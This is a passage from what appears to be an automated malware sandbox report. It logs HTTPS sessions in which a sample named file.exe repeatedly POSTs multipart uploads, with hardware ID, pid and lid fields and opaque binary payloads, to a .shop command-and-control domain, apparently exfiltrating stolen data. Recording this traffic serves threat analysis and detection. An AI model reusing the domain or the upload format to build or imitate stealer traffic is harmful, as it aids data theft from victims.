2024-04-27 11:26:25 UTC	729	IN	Data Raw: 50 51 36 6d 6c 4d 4c 45 73 31 4c 53 64 55 2f 57 4e 4c 69 48 63 51 76 58 51 47 55 7a 6e 70 31 50 69 67 46 4d 79 55 61 39 51 6b 42 33 44 61 66 5a 6e 49 62 7a 46 4a 49 63 4b 62 31 6d 74 35 51 36 56 6f 63 4c 54 7a 75 44 6d 6b 36 57 54 48 57 4a 4b 64 78 58 41 52 5a 4c 36 4c 7a 78 6e 35 73 2f 74 7a 52 46 32 6d 62 6f 7a 6a 6f 47 77 45 68 76 4e 5a 79 65 53 6f 73 63 54 39 74 48 75 6b 31 64 65 77 79 6b 33 70 6d 55 2b 56 72 61 64 30 76 64 4c 37 57 4c 66 6b 36 4c 49 77 64 56 30 35 70 61 77 46 59 4e 69 57 43 36 51 30 4e 33 48 71 71 55 38 75 33 73 47 72 51 66 57 37 35 4e 32 38 78 39 41 6f 55 54 4c 6e 36 58 6e 45 61 42 43 6b 48 48 52 62 74 4f 51 58 41 47 72 4e 36 61 67 66 6c 63 31 48 56 50 33 53 6d 77 69 58 63 4b 77 30 64 74 4f 39 50 54 4b 75 74 6c 44 38 35 5a 39 78 41 Data Ascii: PQ6mlMLEs1LSdU/WNLiHcQvXQGUznp1PigFMyUa9QkB3DafZnIbzFJIcKb1mt5Q6VocLTzuDmk6WTHWJKdxXARZL6Lzxn5s/tzRF2mbozjoGwEhvNZyeSoscT9tHuk1dewyk3pmU+Vrad0vdL7WLfk6LIwdV05pawFYNiWC6Q0N3HqqU8u3sGrQfW75N28x9AoUTLn6XnEaBCkHHRbtOQXAGrN6agflc1HVP3SmwiXcKw0dtO9PTKutlD85Z9xA
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 33 35 65 35 0d 0a 46 70 38 4b 64 78 70 73 2f 77 7a 6f 71 76 54 2f 59 35 78 46 4f 77 6b 63 73 5a 74 48 64 52 49 77 4c 51 4d 64 42 75 55 6c 43 65 77 32 6e 31 49 69 41 34 56 50 64 64 30 48 51 49 37 53 4d 65 77 76 41 54 32 51 36 6e 35 49 43 7a 6d 59 6b 6f 67 47 77 55 41 38 6c 53 2b 72 37 6a 59 6a 6c 58 38 68 7a 55 73 63 63 38 72 6c 35 41 4d 74 4d 65 6e 37 37 39 6c 33 4f 5a 69 54 51 4b 64 77 6a 44 33 6f 46 36 6f 7a 59 78 76 70 47 7a 6e 42 45 33 53 32 69 6e 6e 41 4b 78 45 70 72 4d 5a 4b 57 52 34 77 45 52 4d 31 54 76 30 46 4d 62 77 32 71 33 35 43 41 73 78 71 30 48 79 6d 57 49 61 6a 4d 49 6b 79 46 62 32 45 75 6e 35 5a 55 68 78 35 36 79 6b 2b 35 54 31 6b 39 59 63 48 4c 31 4f 36 59 54 62 51 66 4b 5a 59 68 76 4d 77 69 54 49 56 45 59 7a 47 62 6e 55 4f 45 41 30 76 49 Data Ascii: 35e5Fp8Kdxps/wzoqvT/Y5xFOwkcsZtHdRIwLQMdBuUlCew2n1IiA4VPdd0HQI7SMewvAT2Q6n5ICzmYkogGwUA8lS+r7jYjlX8hzUscc8rl5AMtMen779l3OZiTQKdwjD3oF6ozYxvpGznBE3S2innAKxEprMZKWR4wERM1Tv0FMbw2q35CAsxq0HymWIajMIkyFb2Eun5ZUhx56yk+5T1k9YcHL1O6YTbQfKZYhvMwiTIVEYzGbnUOEA0vI
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 39 36 45 65 71 4d 32 4d 62 44 57 64 42 2f 54 70 51 54 73 34 4a 30 43 64 4d 4c 42 46 57 4d 30 79 72 72 46 79 65 69 4b 76 64 50 51 7a 31 52 36 4a 53 56 68 2f 35 65 31 33 70 4f 31 79 61 30 6a 33 41 4f 79 6b 35 71 4e 70 71 64 55 49 63 42 54 73 68 4b 76 45 56 42 65 41 69 76 30 39 72 49 6d 7a 2b 33 4e 45 58 4f 5a 75 6a 4f 4f 69 50 73 63 53 78 57 2b 49 49 4d 36 47 56 57 6f 53 72 63 43 45 68 78 53 66 4b 57 32 6f 4c 35 56 4e 46 2b 53 64 6b 6c 74 34 4a 36 41 38 39 5a 5a 44 36 54 6b 30 53 42 41 6b 72 49 54 62 52 61 51 33 73 45 72 4e 79 49 78 72 30 38 74 78 38 43 30 54 37 77 31 44 68 4f 35 55 42 67 50 5a 2b 63 52 63 49 76 52 63 70 4b 75 77 70 36 66 67 65 6b 30 34 7a 47 6d 7a 2f 44 4f 69 71 39 50 39 6a 6e 45 55 37 43 52 79 78 6d 30 64 31 47 68 41 4a 50 7a 6b 2b 7a 54 Data Ascii: 96EeqM2MbDWdB/TpQTs4J0CdMLBFWM0yrrFyeiKvdPQz1R6JSVh/5e13pO1ya0j3AOyk5qNpqdUIcBTshKvEVBeAiv09rImz+3NEXOZujOOiPscSxW+IIM6GVWoSrcCEhxSfKW2oL5VNF+Sdklt4J6A89ZZD6Tk0SBAkrITbRaQ3sErNyIxr08tx8C0T7w1DhO5UBgPZ+cRcIvRcpKuwp6fgek04zGmz/DOiq9P9jnEU7CRyxm0d1GhAJPzk+zT
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 6d 33 35 36 4b 2b 6c 48 61 64 55 66 54 4a 37 53 41 63 41 6a 47 53 47 4d 78 6e 4a 55 43 7a 6d 59 6b 6f 67 47 77 55 41 38 6c 53 2b 72 78 6a 59 33 39 55 70 77 63 4b 63 6c 6f 32 4f 64 6a 5a 71 34 67 4c 44 6d 66 33 52 72 43 54 6b 50 41 52 37 46 4e 51 33 77 50 6f 74 47 53 67 76 4a 53 32 6e 64 4e 30 69 4f 78 67 33 34 43 79 30 46 74 50 35 2b 57 54 59 73 4c 44 34 63 70 33 43 4d 50 65 68 48 71 6a 4e 6a 47 77 6c 66 4b 59 31 4c 61 5a 74 6a 6e 5a 55 43 74 49 48 56 57 2b 50 59 43 68 77 49 50 6b 51 50 33 53 56 31 33 41 36 54 52 6c 59 50 77 57 39 74 35 52 4e 6f 73 75 59 52 38 41 63 78 5a 62 7a 4b 64 6d 6b 79 4d 41 45 4c 44 51 72 6f 49 41 52 56 69 77 5a 53 64 6e 72 4d 4d 6e 6a 52 75 30 53 75 65 68 33 59 4a 68 53 4d 48 49 64 33 31 4b 5a 6c 6d 4a 4b 49 42 73 45 51 50 4a 55 Data Ascii: m356K+lHadUfTJ7SAcAjGSGMxnJUCzmYkogGwUA8lS+rxjY39UpwcKclo2OdjZq4gLDmf3RrCTkPAR7FNQ3wPotGSgvJS2ndN0iOxg34Cy0FtP5+WTYsLD4cp3CMPehHqjNjGwlfKY1LaZtjnZUCtIHVW+PYChwIPkQP3SV13A6TRlYPwW9t5RNosuYR8AcxZbzKdmkyMAELDQroIARViwZSdnrMMnjRu0Sueh3YJhSMHId31KZlmJKIBsEQPJU
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 6a 76 39 52 31 48 46 44 33 69 79 34 67 33 55 63 78 45 52 6c 4f 5a 69 51 54 59 34 4c 51 64 74 47 76 45 4e 48 64 41 65 73 6c 4e 54 75 6d 44 2b 63 63 31 71 57 66 76 4c 4d 54 41 33 4c 51 48 30 78 6b 4a 45 43 36 47 56 51 68 79 6e 63 55 53 63 57 59 75 72 54 6c 73 61 72 46 70 78 34 54 4e 59 70 76 49 42 78 42 73 52 48 59 6a 6d 57 6c 45 71 49 48 45 37 4e 53 62 5a 47 51 48 77 4e 72 39 47 65 67 66 64 53 30 7a 51 4d 76 6b 33 62 7a 48 30 57 68 52 4d 75 66 72 79 61 56 36 45 30 44 36 45 71 71 41 59 6e 46 68 44 43 76 2f 48 47 39 46 69 63 4c 41 43 57 4c 4c 75 49 65 51 72 41 52 47 30 2f 6c 59 39 46 69 52 78 42 78 45 36 2f 51 45 5a 38 44 61 2f 5a 6e 49 72 35 56 64 74 36 54 4e 35 6d 2f 75 51 52 5a 59 56 4d 64 48 37 4c 33 77 4b 68 48 6c 54 62 56 37 70 70 51 6e 4a 4a 77 72 2b Data Ascii: jv9R1HFD3iy4g3UcxERlOZiQTY4LQdtGvENHdAeslNTumD+cc1qWfvLMTA3LQH0xkJEC6GVQhyncUScWYurTlsarFpx4TNYpvIBxBsRHYjmWlEqIHE7NSbZGQHwNr9GegfdS0zQMvk3bzH0WhRMufryaV6E0D6EqqAYnFhDCv/HG9FicLACWLLuIeQrARG0/lY9FiRxBxE6/QEZ8Da/ZnIr5Vdt6TN5m/uQRZYVMdH7L3wKhHlTbV7ppQnJJwr+
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 70 78 2f 53 74 6b 30 74 59 56 79 43 73 78 4c 61 44 53 65 6d 6b 4b 46 41 30 72 4e 54 37 4e 50 54 33 45 47 72 64 79 56 67 76 4e 62 6e 44 6f 71 76 55 33 77 69 32 4a 4f 6e 51 6b 73 48 70 69 4c 59 34 34 46 58 59 6b 70 33 46 63 42 46 57 4b 7a 76 50 48 74 73 31 50 51 4e 42 71 55 5a 72 36 46 65 77 62 4c 52 32 51 36 67 5a 31 4a 69 51 46 4f 78 6b 47 30 53 55 56 31 47 36 7a 55 6b 59 37 30 58 4e 68 36 55 4e 63 70 38 4d 49 53 5a 61 34 4c 61 79 62 54 78 51 44 41 50 31 6e 4f 52 72 67 4b 5a 6e 6f 53 71 39 36 5a 6a 66 38 55 74 42 39 64 6d 45 37 62 6c 52 4a 6c 72 67 74 72 4d 74 50 46 41 4d 41 44 51 38 52 46 70 55 52 50 66 51 43 74 33 6f 69 4a 2f 46 6e 66 64 45 66 45 4a 36 4b 44 63 51 76 47 54 32 4d 78 6e 35 56 49 77 45 41 6e 6f 69 72 33 54 31 63 39 55 65 69 55 74 6f 58 69 Data Ascii: px/Stk0tYVyCsxLaDSemkKFA0rNT7NPT3EGrdyVgvNbnDoqvU3wi2JOnQksHpiLY44FXYkp3FcBFWKzvPHts1PQNBqUZr6FewbLR2Q6gZ1JiQFOxkG0SUV1G6zUkY70XNh6UNcp8MISZa4LaybTxQDAP1nORrgKZnoSq96Zjf8UtB9dmE7blRJlrgtrMtPFAMADQ8RFpURPfQCt3oiJ/FnfdEfEJ6KDcQvGT2Mxn5VIwEAnoir3T1c9UeiUtoXi
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 79 2b 54 64 76 4d 66 52 61 46 45 79 35 2b 73 49 70 55 69 68 55 50 6f 53 71 6f 42 69 63 57 45 4d 4b 2f 38 63 62 30 57 4a 77 73 41 4a 59 72 74 34 4a 79 43 4d 74 4e 66 6a 4b 63 6d 30 4b 42 42 45 4c 46 53 72 42 47 52 48 73 4d 70 39 53 63 67 50 64 51 32 48 70 42 6c 6d 6a 59 35 78 46 4f 77 6c 4d 73 5a 74 48 64 5a 61 30 2f 44 65 70 57 6f 55 4a 49 63 52 2b 68 31 5a 6d 51 2f 6b 53 63 48 43 6e 4a 61 4e 6a 6e 59 32 61 75 49 43 77 35 6e 39 30 61 77 6b 35 45 78 30 53 32 52 45 56 36 42 37 6a 56 6b 49 72 79 55 39 74 2f 55 4e 30 30 75 34 52 35 41 4d 31 43 62 44 43 54 6e 45 2b 41 54 67 47 68 4b 74 77 49 53 47 56 4a 38 70 62 61 6f 39 42 44 79 6e 34 41 39 54 47 6d 68 6e 30 43 30 30 42 74 50 59 57 51 55 73 42 6d 4a 4e 59 50 33 79 4e 57 46 57 4c 42 6c 4a 32 4b 73 77 79 65 4e Data Ascii: y+TdvMfRaFEy5+sIpUihUPoSqoBicWEMK/8cb0WJwsAJYrt4JyCMtNfjKcm0KBBELFSrBGRHsMp9ScgPdQ2HpBlmjY5xFOwlMsZtHdZa0/DepWoUJIcR+h1ZmQ/kScHCnJaNjnY2auICw5n90awk5Ex0S2REV6B7jVkIryU9t/UN00u4R5AM1CbDCTnE+ATgGhKtwISGVJ8pbao9BDyn4A9TGmhn0C00BtPYWQUsBmJNYP3yNWFWLBlJ2KswyeN
2024-04-27 11:26:25 UTC	1369	IN	Data Raw: 32 7a 43 4a 4d 6c 51 55 45 56 66 6a 64 52 70 46 4f 46 34 73 52 35 52 4d 61 4c 6c 37 36 68 76 4c 74 37 42 71 30 48 31 75 2b 54 64 76 4d 62 45 36 64 43 54 35 77 2b 2f 59 70 77 42 77 50 6b 51 50 33 44 30 46 77 43 4b 6e 61 6d 5a 54 68 55 74 39 69 51 5a 45 59 6a 71 31 33 42 63 6c 47 59 7a 57 74 6f 32 4f 4e 42 55 50 45 54 72 78 32 63 57 67 4b 70 4e 71 64 6b 4f 49 55 6b 68 77 70 76 57 61 2f 7a 43 4a 4d 2f 41 73 6b 66 71 7a 54 4b 75 74 6c 44 39 45 42 37 77 6f 50 53 41 71 6b 32 70 32 51 34 68 6e 39 65 55 6e 61 4b 37 2b 48 4f 6b 43 74 49 41 64 2b 6c 64 30 61 77 6c 34 42 6f 53 72 63 43 45 74 73 53 66 4b 57 79 74 53 6f 41 59 38 6a 45 6f 52 4f 32 35 4d 30 5a 71 35 53 42 46 58 34 33 56 54 41 56 67 32 62 44 39 38 6a 4a 44 30 62 36 6f 7a 59 78 72 52 58 7a 6d 5a 45 31 54 Data Ascii: 2zCJMlQUEVfjdRpFOF4sR5RMaLl76hvLt7Bq0H1u+TdvMbE6dCT5w+/YpwBwPkQP3D0FwCKnamZThUt9iQZEYjq13BclGYzWto2ONBUPETrx2cWgKpNqdkOIUkhwpvWa/zCJM/AskfqzTKutlD9EB7woPSAqk2p2Q4hn9eUnaK7+HOkCtIAd+ld0awl4BoSrcCEtsSfKWytSoAY8jEoRO25M0Zq5SBFX43VTAVg2bD98jJD0b6ozYxrRXzmZE1T

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49753	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:25 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18160 Host: palmeventeryjusk.shop
2024-04-27 11:26:25 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:25 UTC	2829	OUT	Data Raw: 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X\|mn^IUm'3R?l
2024-04-27 11:26:26 UTC	812	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=60ulpu26vdvo4ab9vu12qvo4b7; expires=Wed, 21-Aug-2024 05:13:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBcR3r13r%2BEWViWzFPHc4hu1vjXWDh19Wc5Y%2Fe2tkN5npKFY3NrSwNaY7KLxzfK28BmK%2B7b6vLeXUMUzYbx5Gu%2FXTRCc%2FaW0tgxiArQjvYOP9%2BemxWsdDP3GzQ373ZdbCPCMS4yeg8I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae75248dcc8cb1-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:26 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 38 35 0d 0a Data Ascii: 11ok 154.16.192.185
2024-04-27 11:26:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49754	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:26 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8781 Host: palmeventeryjusk.shop
2024-04-27 11:26:26 UTC	8781	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:27 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dqnjppk18kg4uqfogo78fsdn0p; expires=Wed, 21-Aug-2024 05:13:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYB3LhdoK%2BKkg0mJGTdRxfkXG13IiYCiDxs9vHA9W9ix5BHNKENoTjzyCFeu04%2FnUYfXeNJbZZrRk4TYqvVcFJVstXM1fQMRp0gF2QldQf7Oe%2FMdb6ND05AhrKcTMQwcT%2FmgyZk0oJw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae752a0d5c42a6-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:27 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 38 35 0d 0a Data Ascii: 11ok 154.16.192.185
2024-04-27 11:26:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49755	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:27 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20434 Host: palmeventeryjusk.shop
2024-04-27 11:26:27 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:27 UTC	5103	OUT	Data Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-04-27 11:26:28 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rhdu4hvkf2frhvhrh4oqiotc1h; expires=Wed, 21-Aug-2024 05:13:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ztU0B1KAsDWBuzHGqTdUVJQ%2B2qSjcXE5jvN4BIoRS0vYsqvWJ3T8zrbC27Fh%2BXsiYVFUzXnEh0pnKHWuBXMvwvyVB7JjrFxNSjvbHeA4cJKctjgRSA0hZj5%2F22HDs0Ca3x6EkMTVb6w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae752f6cc941ef-EWR alt-svc: h3=":443"; ma=86400
2024-04-27 11:26:28 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 34 2e 31 36 2e 31 39 32 2e 31 38 35 0d 0a Data Ascii: 11ok 154.16.192.185
2024-04-27 11:26:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49756	172.67.155.93	443	6884	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-27 11:26:28 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7087 Host: palmeventeryjusk.shop
2024-04-27 11:26:28 UTC	7087	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 38 38 43 42 33 35 37 46 45 34 36 43 38 38 36 32 37 37 43 41 36 33 31 34 41 39 32 32 44 34 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 47 6c 4d 4d 6e 2d 2d 71 62 0d 0a 2d Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"788CB357FE46C886277CA6314A922D48--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"pGlMMn--qb-
2024-04-27 11:26:29 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 11:26:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=78oea5pj4u75g2mfjep8k6381e; expires=Wed, 21-Aug-2024 05:13:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cm0I6ukrPwgjDbc1si97nJX78alB12CtEUMuWoPcXXZt22lswexegZdRY%2Bo3IEGndYDrAjBFbryH%2FNKYx8UjFTGyHmfHmuDWIc1LD26rHAer%2BMokoDpX%2BUM5gdiXJg3yWQAshzZXNsE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87ae7536b96b0cae-EWR alt-svc: h3=":443"; ma=86400
